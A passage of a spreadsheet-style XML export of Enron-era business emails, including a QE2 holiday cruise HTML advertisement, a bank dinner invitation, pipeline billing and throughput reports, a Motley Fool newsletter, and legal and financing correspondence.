&lt;BODY BGCOLOR=#FFFFFF&gt;_x000D_
		&lt;table width="600" border="1" cellspacing="0" cellpadding="0" align="center" bordercolor="#000000"&gt;_x000D_
  &lt;tr&gt;_x000D_
    &lt;td height="744"&gt;_x000D_
      &lt;table width=600 border=0 cellpadding=0 cellspacing=0 height="736"&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td rowspan=5 valign="top"&gt;&lt;a href="http://www.ovc.cc/special_deal.cfm?specialsID=34"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/ball.jpg" width=236 height=430 align="top" border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
          &lt;td colspan=2 valign="top"&gt;&lt;a href="http://www.ovc.cc/special_deal.cfm?specialsID=34"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/six-cat-upgr.gif" width="364" height="96" border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=96&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td colspan=2 valign="top"&gt; &lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/HolydayCruise.jpg" width=364 height=178 align="top"&gt;&lt;/td&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=178&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td rowspan=5 valign="top"&gt; &lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/treeRight.jpg" width=56 height=462 align="top"&gt;&lt;/td&gt;_x000D_
          &lt;td rowspan=5 valign="top"&gt;_x000D_
								&lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Book_x000D_
              the most exciting holiday ever aboard Queen Elizabeth 2 and experience_x000D_
              what it&amp;#146;s like to have our world-famous staff on hand to attend_x000D_
              to every detail. That leaves you free to enjoy our Christmas and_x000D_
              New Year&amp;#146;s gala celebrations with your family.&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
								&lt;div align="center"&gt;_x000D_
									&lt;p&gt;&lt;a href="http://www.ovc.cc/special_deal.cfm?specialsID=34"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/2865-c.gif" width="250" height="44" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.ovc.cc/special_deal.cfm"&gt;&lt;br&gt;_x000D_
										&lt;/a&gt;&lt;/p&gt;_x000D_
									&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;&lt;b&gt;December 22, 2001 - January 5, 2002&lt;br&gt;_x000D_
											&lt;/b&gt;&lt;i&gt;&lt;font color="#003300"&gt;14 days - Round-trip Ft. Lauderdale&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
								&lt;/div&gt;_x000D_
								&lt;div align="center"&gt;_x000D_
									&lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;font color="#003300" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;_x000D_
												St. Croix, St. Kitts, Martinique, Barbados, St. Lucia, Grenada and Curacao&lt;br&gt;_x000D_
											&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
									&lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;For Reservations Call 1-800-780-9002&lt;br&gt;_x000D_
_x000D_
_x000D_
              or any Travel Agent&lt;/b&gt;&lt;br&gt;_x000D_
_x000D_
_x000D_
              Visit us on the web @ &lt;a href="http://www.onlinevacationcenter.com?click&amp;cunard&amp;3bcc9d22%20"&gt;onlinevacationcenter.com&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
								&lt;/div&gt;_x000D_
								&lt;div align="center"&gt;_x000D_
									&lt;a href="http://www.onlinevacationcenter.com"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/OVC-AMEX2.gif" width="258" height="101" border="0"&gt;&lt;/a&gt;&lt;/div&gt;_x000D_
							&lt;/td&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=1&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=94&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=61&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td valign="top"&gt; &lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/pearl.jpg" width=236 height=174 align="top"&gt;&lt;/td&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=174&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td valign="top" height="2"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/pearl2.jpg" width=236 height=132 align="top"&gt;&lt;/td&gt;_x000D_
          &lt;td height="2"&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=132&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
        &lt;tr&gt;_x000D_
          &lt;td colspan=2 valign="top"&gt; &lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/bottomLeft.jpg" width=292 height=64 align="top"&gt;&lt;/td&gt;_x000D_
          &lt;td valign="top"&gt;&lt;img src="http://www.onlinevacationcenter.com/emails/Cunard3/bottomRight.jpg" width="308" height="64" border="0"&gt;&lt;/td&gt;_x000D_
          &lt;td&gt; &lt;img src="../../../Local%20Settings/Temp/images/spacer.gif" width=1 height=64&gt;&lt;/td&gt;_x000D_
        &lt;/tr&gt;_x000D_
      &lt;/table&gt;_x000D_
    &lt;/td&gt;_x000D_
  &lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
		&lt;div align="center"&gt;_x000D_
			&lt;font size="3"&gt;* Due to the exceptional nature of this rate, full payment is required at booking.&lt;br&gt;_x000D_
				Price is double occupancy and excludes port charges and fees.&lt;br&gt;_x000D_
				This offer is strictly space available and is first come, first served.&lt;/font&gt;&lt;/div&gt;_x000D_
	&lt;/BODY&gt;_x000D_
&lt;/HTML&gt;_x000D_
		</t>
  </si>
  <si>
    <t>Tue, 3 Jul 2001 11:45:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ellen_prendergast@america.hypovereinsbank.com'})</t>
  </si>
  <si>
    <t>Save the Date</t>
  </si>
  <si>
    <t>_x000D_
Richard B. Buy_x000D_
EVP &amp; Chief Risk Officer_x000D_
Enron Corporation_x000D_
1400 Smith Street - 50th Floor_x000D_
Houston, Texas 77002-7361_x000D_
_x000D_
RE:  Reception &amp; Dinner on_x000D_
     October 24, 2001 in Houston, Texas_x000D_
_x000D_
Dear Mr. Buy:_x000D_
_x000D_
As  one of our most valued clients, HVB America hopes that you will be able_x000D_
to join us on the evening of Wednesday, October 24, 2001 in Houston, Texas._x000D_
_x000D_
Stephen  Bub,  a  member  of  HVB's  Board  of Directors and the CEO of HVB_x000D_
America  and  Asia  will  host  the  event,  which includes a reception and_x000D_
dinner.  Other  senior  officers  from our Munich and New York offices will_x000D_
attend as well._x000D_
_x000D_
Within the next 2-3 weeks, we shall provide you with additional details. In_x000D_
the meantime, however, please make a note in your diary._x000D_
_x000D_
_x000D_
Sincerely yours,_x000D_
_x000D_
Yoram Dankner</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 04:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'christine.stokes@enron.com', 'cynthia.rivers@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'teresa.mcomber@enron.com', 'kevin.hyatt@enron.com', 'linda.ward@enron.com', 'albert.hernandez@enron.com', 'jeffery.fawcett@enron.com', 'terry.galassini@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'martha.cormier@enron.com', 'randy.janzen@enron.com', 'lindy.donoho@enron.com', 'darrell.schoolcraft@enron.com', 'terry.kowalke@enron.com'})</t>
  </si>
  <si>
    <t>September PNR Activity</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the September 2000 billing for park n ride._x000D_
_x000D_
Please note: _x000D_
USGT (PO 27268) carried over into September a balance of 7,247 at $0.03 per _x000D_
day and that quantity remains on USGT's account. This results in an effective _x000D_
rate of $0.2454 per Dth. _x000D_
Sempra (PO 27255) held a carryover park quantity of 6,000 MMBtu from a _x000D_
previous month that was finally balanced on September 8th. _x000D_
_x000D_
If you have any questions, please call me at  x36486._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 19:57:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.hoog@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">the attached file is a summary of what i wanted to go over with you as a review of this year and our forthcoming strategy.  it has been modified slightly for the current situation.  let me know when you have time to go over it.  it shouldnt take long._x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jan 2000 09:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Please be informed that you  have one or more SRRS requests that are _x000D_
outstanding due to a pending action to approve or reject decision on your _x000D_
part. Please  go to the SRRS (Lotus Notes desktop icon) and select the _x000D_
"Requests Awaiting my Approval" option and complete the necessary  action. _x000D_
More SRRS request information can be seen within the request by clicking on _x000D_
"Resource Display".  _x000D_
_x000D_
Your response will enable the SRRS process to continue for eventual closure. _x000D_
_x000D_
Thank you, _x000D_
Information Risk Management _x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 07:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Example: Deal Correction Report</t>
  </si>
  <si>
    <t xml:space="preserve">Yeah this is great.  Is is possible to add me to the list?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                04/09/2001 02:02 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Example: Deal Correction Report_x000D_
_x000D_
Here you go!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 17:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Calpine Monthly Average Revised</t>
  </si>
  <si>
    <t xml:space="preserve">Darren - Attached is the April schedule for Calpine (Average was revised)_x000D_
_x000D_
Thanks - Julie _x000D_
x58639_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ricky Archer &lt;RickyA@calpine.com&gt;@ENRON  _x000D_
Sent:	Tuesday, March 27, 2001 2:42 PM_x000D_
To:	Kemp, Juliann_x000D_
Subject:	Calpine Monthly Average Revised_x000D_
_x000D_
 &lt;&lt;CALPINE MONTHLY GAS NOMINATION___.doc&gt;&gt;_x000D_
_x000D_
RICKY A. ARCHER_x000D_
Fuel Supply_x000D_
700 Louisiana, Suite 2700_x000D_
Houston, Texas 77002_x000D_
713-830-8659 direct_x000D_
713-830-8722 fax_x000D_
_x000D_
_x000D_
 - CALPINE MONTHLY GAS NOMINATION___.doc </t>
  </si>
  <si>
    <t>FoolWatch: Lucent At Bat</t>
  </si>
  <si>
    <t>__________________________________________________________________x000D_
_x000D_
                        F O O L W A T C H_x000D_
                    Monday, October 23, 2000_x000D_
_x000D_
benjamin.rogers@enron.com_x000D_
__________________________________________________________________x000D_
_x000D_
REGISTER TO BECOME A FOOL -- GET FREE STUFF!_x000D_
http://www.fool.com/m.asp?i=3D165413_x000D_
__________________________________________________________________x000D_
_x000D_
                        Close    Change  %Change_x000D_
_x000D_
            NOW 50    1,826.04   -11.27   -0.61%_x000D_
            DJIA     10,271.72   +45.13   +0.44%_x000D_
            S&amp;P 500   1,395.77    -1.16   -0.08%_x000D_
            NASDAQ    3,468.69   -14.45   -0.41%_x000D_
            (Numbers as of 5:00 p.m. ET)_x000D_
_x000D_
_x000D_
 SPONSORED BY: BUYandHOLD_x000D_
 Hey Fool! Want to know the SECRET to long-term investing?_x000D_
      Compounding and dollar-cost averaging! Start investing with_x000D_
      as little as $20! Just $2.99 per order!_x000D_
      http://www.lnksrv.com/m.asp?i=3D165414_x000D_
_x000D_
_x000D_
SPECIAL: LUCENT AT BAT_x000D_
  The CEO has been ejected from the game. Time to look_x000D_
  back at Lucent's stats for the season._x000D_
http://www.fool.com/m.asp?i=3D165415_x000D_
_x000D_
VALUE PORT: CISCO'S FORMIDABLE CHALLENGE_x000D_
  What will Cisco's returns look like in the future?_x000D_
http://www.fool.com/m.asp?i=3D165416_x000D_
_x000D_
RULE BREAKER: AOL OUT OF THE SWIRL_x000D_
  AOL reports that the recent dot-com meltdown will actually be_x000D_
  good for the company._x000D_
http://www.fool.com/m.asp?i=3D165417_x000D_
_x000D_
RULE MAKER: THOUGHTS ON RETIREMENT_x000D_
  Start planning now, and the power of compound interest will be_x000D_
  on your side._x000D_
http://www.fool.com/m.asp?i=3D165418_x000D_
_x000D_
FOOL ON THE HILL: WHY FOOLS WEAR HATS_x000D_
  Rob Landley says our jester cap is a symbol of a most Foolish_x000D_
  trait: the willingness to learn from your mistakes._x000D_
http://www.fool.com/m.asp?i=3D165419_x000D_
_x000D_
RETIREE PORT: WHEN NOT TO USE YOUR 401(K) PLAN_x000D_
  Should you ever not take maximum advantage of a tax-deferred_x000D_
  savings plan? David Braze reports his findings._x000D_
http://www.fool.com/m.asp?i=3D165420_x000D_
_x000D_
FOOL PLATE SPECIAL: NBCI EXECS EXIT_x000D_
  With the company=01,s president and several top execs abruptly_x000D_
  splitting, is peacock portal NBCi about to lay another egg?_x000D_
http://www.fool.com/m.asp?i=3D165421_x000D_
_x000D_
HOT TOPICS_x000D_
  Fools are talking about: Qualcomm vs. Nokia, self-installing_x000D_
  Excite@Home, and more._x000D_
http://www.fool.com/m.asp?i=3D165422_x000D_
_x000D_
FOOLISH FOUR: HANDS OFF THE 401(K)_x000D_
  Thinking of making a withdrawal from your 401(k) for some quick_x000D_
  cash? Ouch, bad idea._x000D_
http://www.fool.com/m.asp?i=3D165423_x000D_
_x000D_
DAILY DOUBLE: ADVANTAGE EARNS AN A+_x000D_
  Classroom-software maker Advantage Learning Systems finds its_x000D_
  stock value at the top of the class._x000D_
http://www.fool.com/m.asp?i=3D165424_x000D_
_x000D_
FRIBBLE: STOCK MARKET WIZARD_x000D_
  This Fool penned a timely tune about recent stock market_x000D_
  volatility._x000D_
http://www.fool.com/m.asp?i=3D165425_x000D_
_x000D_
BREAKFAST WITH THE FOOL: GENERAL ELECTRIC TO PURCHASE HONEYWELL_x000D_
  General Electric announced plans to buy Honeywell for nearly_x000D_
  $48.4 billion in stock and debt._x000D_
http://www.fool.com/m.asp?i=3D165426_x000D_
_x000D_
__________________________________________________________________x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=3D165427_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=3D165428_x000D_
My Fool: http://www.fool.com/m.asp?i=3D165429_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=3D165430_x000D_
My E-Mail Settings: http://www.fool.com/m.asp?i=3D165431_x000D_
_x000D_
_x000D_
 SPONSORED BY: BUYandHOLD_x000D_
 Hey Fool! Want to know the SECRET to long-term investing?_x000D_
      Compounding and dollar-cost averaging! Start investing with_x000D_
      as little as $20! Just $2.99 per order!_x000D_
      http://www.lnksrv.com/m.asp?i=3D165432_x000D_
_x000D_
_x000D_
WANT TO RETIRE EARLY?_x000D_
 We'll help you set your retirement_x000D_
 date (literally!) in our Roadmap to_x000D_
 Retirement Online Seminar._x000D_
http://www.fool.com/m.asp?i=3D165433_x000D_
_x000D_
WIRELESS 201: NOKIA, QUALCOMM AND MORE_x000D_
 Check out the sequel to the_x000D_
 best-selling "Wireless 101" on Soapbox.com_x000D_
http://www.lnksrv.com/m.asp?i=3D165434_x000D_
_x000D_
FOOL DIRECT E-MAIL SERVICES_x000D_
 Need to change your address or unsubscribe? You_x000D_
 can also temporarily suspend mail delivery._x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=3Dbenjamin.r=_x000D_
ogers_x000D_
@enron.com_x000D_
_x000D_
 Have ideas about how we can improve the Fool Direct or new_x000D_
 e-mail products you'd like to see? Try our discussion board:_x000D_
http://www.fool.com/m.asp?i=3D165435_x000D_
_x000D_
__________________________________________________________________x000D_
(c) Copyright 2000, The Motley Fool. All rights reserved. This_x000D_
material is for personal use only. Republication and_x000D_
redissemination, including posting to news groups, is expressly_x000D_
prohibited without the prior written consent of The Motley Fool._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MsgId: msg-4760-B10239749Address.msg-18:41:43(10-23-2000)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: benjamin.rogers@enron.com</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Getchen is in our personnel dept.  She will coordinate filling job positions _x000D_
with candidates.  If you just emailed her your resume, you might want to give _x000D_
her a few days because she is working on lots of jobs.  I've used her before, _x000D_
so you might want to mention my name, say I work in the Enron North America _x000D_
Legal Dept.  She is really sweet.</t>
  </si>
  <si>
    <t>Fri, 20 Jul 2001 07:49:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Legal Question about Removing People from_x000D_
 Peoplefinder/Expertfinder</t>
  </si>
  <si>
    <t xml:space="preserve">Alan,_x000D_
 _x000D_
I understand that you have approved the request below.  Is this because they are WRA personnel?_x000D_
 _x000D_
Thanks.  _x000D_
_x000D_
Michelle_x000D_
-----Original Message-----_x000D_
: High_x000D_
_x000D_
_x000D_
Hi Michelle, please see below.  Should I just take this for face value or inquire as to why?  I've only been asked to take off 1 person for harrassment before.  This just seems strange getting a list of people without any explaination._x000D_
_x000D_
-----Original Message----- _x000D_
From: Deleon, Roberto _x000D_
Sent: Thu 6/7/2001 3:58 PM _x000D_
To: Schultea, Kathryn _x000D_
Cc: _x000D_
Subject: Removal from People/Expert Finder_x000D_
_x000D_
_x000D_
_x000D_
Kathryn, _x000D_
_x000D_
I need to have the following individuals removed from both People &amp; Expert Finder.  Jeff Jones at HRGIM informs me that you are the contact to have this done._x000D_
_x000D_
Users Name      Phone Number   _x000D_
Rick Boehm      713-751-7945   _x000D_
Dan Orbeck Jr   713-654-0197   _x000D_
Ken Kooser      713-654-4039   _x000D_
Don Chancey     713-654-4032   _x000D_
Angela J Wingo  713-751-7925   _x000D_
John F Anderson 713-853-3188   _x000D_
Jeremy Waggenspack      713-853-6161   _x000D_
Brian Mihura    713-654-4032   _x000D_
Junichi Sugiura 713-853-6161   _x000D_
_x000D_
_x000D_
This request has been approved by Alan Aronowitz (EN-Legal Emerging Markets) _x000D_
_x000D_
Regards _x000D_
Roberto DeLeon _x000D_
Manager, IT Security &amp; Controls </t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 02:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sara Shackleton/HOU/ECT is out of the office.</t>
  </si>
  <si>
    <t xml:space="preserve">I thought we agreed to remove the CSA and that you still had a few legal _x000D_
issues outstanding.  Have we sent them a redraft?_x000D_
_x000D_
_x000D_
From: Sara Shackleton on 10/24/2000 08:16 AM_x000D_
To: Tanya Rohauer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Sara Shackleton/HOU/ECT is out of the office._x000D_
_x000D_
Tanya:  SITA wants to know what is taking so long to finalize the ISDA!  _x000D_
Also, I ran into Michael M. last night and he even asked!  Do you know who is _x000D_
handling?  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 10/24/2000 08:18 AM -----_x000D_
_x000D_
	"Susan Hopkinson" &lt;susan.hopkinson@lovells.com&gt;_x000D_
	10/24/2000 04:53 AM_x000D_
		 _x000D_
		 To: &lt;Sara.Shackleton@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Re: Sara Shackleton/HOU/ECT is out of the office._x000D_
_x000D_
_x000D_
CONFIDENTIALITY This e-mail and any attachments are confidential_x000D_
and may also be privileged. If you are not the named recipient,_x000D_
please notify the sender immediately and do not disclose the_x000D_
contents to another person, use it for any purpose, or store_x000D_
or copy the information in any medium._x000D_
----------------------------------------------------------------_x000D_
_x000D_
 _x000D_
Sara_x000D_
?_x000D_
I have tried to send you the attached fax, however it is not  going through _x000D_
to you so I am attaching it instead by email._x000D_
?_x000D_
Do you have another fax number in case this happens  again?_x000D_
Thanks_x000D_
Susan_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
Lovells (the merged firm of Lovell White Durrant and _x000D_
Boesebeck Droste, practising as Lovells Boesebeck Droste in_x000D_
some jurisdictions) is an international law firm._x000D_
_x000D_
In the event of any technical difficulty with this email, please contact_x000D_
the sender or the London Technology Department on +44 (0) 20 7296 2000._x000D_
_x000D_
 - Sara Shackleton ENRON_v1.DOC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 05:39:20 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Information on Trading Book</t>
  </si>
  <si>
    <t>_x000D_
John, _x000D_
_x000D_
Greg told me to give you this - these guys are on their way down_x000D_
_x000D_
Ray_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Richard.S.Walker@jpmorgan.com@ENRON  _x000D_
Sent:	Tuesday, November 27, 2001 10:14 PM_x000D_
To:	Bowen Jr., Raymond_x000D_
Cc:	andrew.feldstein@jpmorgan.com; Jeffrey.W.Dellapina@jpmorgan.com; Eric.Fornell@jpmorgan.com_x000D_
Subject:	Fw: Information on Trading Book_x000D_
_x000D_
Ray -_x000D_
_x000D_
Per our conversation, see the informational requests that will be essential_x000D_
as we head down the next path._x000D_
_x000D_
Andrew Feldstein and Dinsa Mehta are coming in tomorrow and will be focused_x000D_
on the trading book aspect of our analysis. They will be in town and ready_x000D_
to go by noon._x000D_
_x000D_
See you tomorrow_x000D_
_x000D_
Rick_x000D_
_x000D_
_x000D_
--------------------------_x000D_
Sent from Richard Walker's BlackBerry Wireless Handheld_x000D_
(www.BlackBerry.net)_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From:Andrew Feldstein_x000D_
To:CN=Richard S. Walker/O=CHASE_x000D_
Cc:CN=Jeffrey W. Dellapina/O=CHASE_x000D_
Date: 11/26/2001 06:44:19 PM_x000D_
Subject:Information on Trading Book_x000D_
_x000D_
In order to advance the dialogue on any structures which involve taking_x000D_
risk to_x000D_
the trading business, we'll need to start out with the following_x000D_
information._x000D_
I was hoping you could communicate this to the company.   Jeff had_x000D_
previously_x000D_
requested some of this; but we haven't gotten anything.  If you know of_x000D_
people_x000D_
internally who have some of the information, we can get it from them;_x000D_
although_x000D_
it's kind of important that all the information is recent and from the same_x000D_
(or_x000D_
very close) date._x000D_
_x000D_
1.  Break down of the balance sheet positions(unrealized gains and_x000D_
unrealized_x000D_
losses) by trading book and product type._x000D_
_x000D_
2. List of UG/L of largest counterparties on both the UG and UL side_x000D_
(hopefully_x000D_
20-30% of cpties make up 70-80% of UG/L)_x000D_
_x000D_
3.  Break out balance sheet by type of contract (ISDA vs other contracts)._x000D_
_x000D_
4.  Risk positions/sensitivities based on their standard units of_x000D_
measure/methodologies; eg,_x000D_
- price sensitivities_x000D_
- vol sensitivities_x000D_
- VAR_x000D_
- stress tests_x000D_
_x000D_
5.  Historical P&amp;L statements for each trading book (monthly) going back_x000D_
2yrs._x000D_
_x000D_
6.  Analysis of collateral/margin provisions.  How much currently posted._x000D_
What_x000D_
happens with downgrades/upgrades._x000D_
_x000D_
_x000D_
Jeff - have I missed or misstated anything?_x000D_
_x000D_
We shld discuss how it would be best to go through the info (over the_x000D_
phone, we_x000D_
go there, they come here, etc).  But first step is having them pull it_x000D_
together; or tell us what they can/will provide._x000D_
_x000D_
Thanks a lot._x000D_
_x000D_
Andrew_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This communication is for informational purposes only.  It is not intended as_x000D_
an offer or solicitation for the purchase or sale of any financial instrument_x000D_
or as an official confirmation of any transaction. All market prices, data_x000D_
and other information are not warranted as to completeness or accuracy and_x000D_
are subject to change without notice. Any comments or statements made herein_x000D_
do not necessarily reflect those of J.P. Morgan Chase &amp; Co., its_x000D_
subsidiaries and affiliates.</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CA Data Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Kay,  Please review attached.  Thanks._x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nosheen.ali@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'buddy.aiken@enron.com', 'michael.farmer@enron.com', 'ect.output@enron.com'})</t>
  </si>
  <si>
    <t>Revised Flash London Summary 03 Jan. 2001</t>
  </si>
  <si>
    <t>Revision of 5 day rolling figures due to year end macro recalculation error _x000D_
in previous flash.  All other P/L numbers are correct and unchanged.</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 01:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Transwestern Throughput Report</t>
  </si>
  <si>
    <t>This Friday report has traditionally gone to Steve &amp; Kevin.  The entire _x000D_
commercial group will receive it going forward._x000D_
_x000D_
For the week August 14-18th:_x000D_
_x000D_
Transwestern's weekly average deliveries to California were 1,001 MMcf/d _x000D_
while east end deliveries averaged 406 MMcf/d.  San Juan lateral throughput _x000D_
averaged 850 MMcf/d while receipts from Rio Puerco were at the maximum 75 _x000D_
MMc/f level for the entire week.  Transwestern had consistent deliveries even _x000D_
to Mojave/Topock this week of 52 Mmcf/d - a record for that delivery point._x000D_
_x000D_
El Paso deliveries to California averaged an 82% throughput level of 2,425 _x000D_
Mmcf/d for the week:_x000D_
_x000D_
 PG&amp;ETop (capacity 1,140 MMcf/d) deliveries averaged 706 MMcf/d_x000D_
 SoCalEhr (capacity 1,247 MMcf/d) deliveries averaged 1,191 MMcf/d_x000D_
 SoCalTop (capacity 542 MMcf/d) deliveries averaged 528 MMcf/d._x000D_
_x000D_
Average basis quotes for the week (show in $):_x000D_
_x000D_
  Sep.  Oct  Nov-March '01  April-Oct '01_x000D_
SJ-CA  1.26  1.00         .56        .72_x000D_
Perm-CA   .68    .721          .45         .55_x000D_
Perm-Waha   .015     0          .03          .05</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 04:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.schrab@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: December Nominations for VR 376 ( VR 375 #A-1/#A-1-D)</t>
  </si>
  <si>
    <t xml:space="preserve">Tom,_x000D_
I politely advised the lady with Spinnaker that she needs to get me the _x000D_
changes by 10:30 or I would have to make the change the following day._x000D_
Just a FYI....they called at 11:15 and just Emailed it to me._x000D_
Mark_x000D_
---------------------- Forwarded by Mark L Schrab/HOU/ECT on 12/04/2000 12:44 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Billyoung3@aol.com on 12/04/2000 11:52:15 AM_x000D_
To: nferrie@enron.com, mschrab@enron.com, victoria.versen@enron.com, _x000D_
RYKESTER@aol.com, sschro@wtoffshore.net, ajt3@petroquest.com_x000D_
cc:  _x000D_
Subject: Fwd: December Nominations for VR 376 ( VR 375 #A-1/#A-1-D)_x000D_
_x000D_
_x000D_
Nelson please coordinate renominations per attached. If for any reason Enron _x000D_
differs in opinion, please advise asap._x000D_
Return-Path: &lt;mgullette@petroquest.com&gt;_x000D_
Received: from  rly-zd04.mx.aol.com (rly-zd04.mail.aol.com [172.31.33.228]) _x000D_
by air-zd02.mail.aol.com (v77.14) with ESMTP; Mon, 04 Dec 2000 11:39:19 -0500_x000D_
Received: from  linux1.globalreach.net (linux1.globalreach.net _x000D_
[206.97.249.10]) by rly-zd04.mx.aol.com (v76_r1.19) with ESMTP; Mon, 04 Dec _x000D_
2000 11:39:07 -0500_x000D_
Received: from marilyn2 (as18.globalreach.net [206.97.249.118]) by _x000D_
linux1.globalreach.net (8.9.3/8.9.3) with SMTP id KAA26701; Mon, 4 Dec 2000 _x000D_
10:38:45 -0600_x000D_
From: "Marilyn Gullette" &lt;mgullette@petroquest.com&gt;_x000D_
To: "Bill Young \(E-mail\)" &lt;Billyoung3@aol.com&gt;,        "Tom Jones _x000D_
\(E-mail\)" &lt;tjones@spinexp.com&gt;_x000D_
Cc: "Alfred Thomas, III"@linux1.globalreach.net_x000D_
Subject: December Nominations for VR 376 ( VR 375 #A-1/#A-1-D)_x000D_
Date: Mon, 4 Dec 2000 10:42:20 -0600_x000D_
Message-ID: &lt;000e01c05e11$2e214080$2c01a8c0@marilyn2&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----=_NextPart_000_000F_01C05DDE.E3885720"_x000D_
X-Priority: 3 (Normal)_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)_x000D_
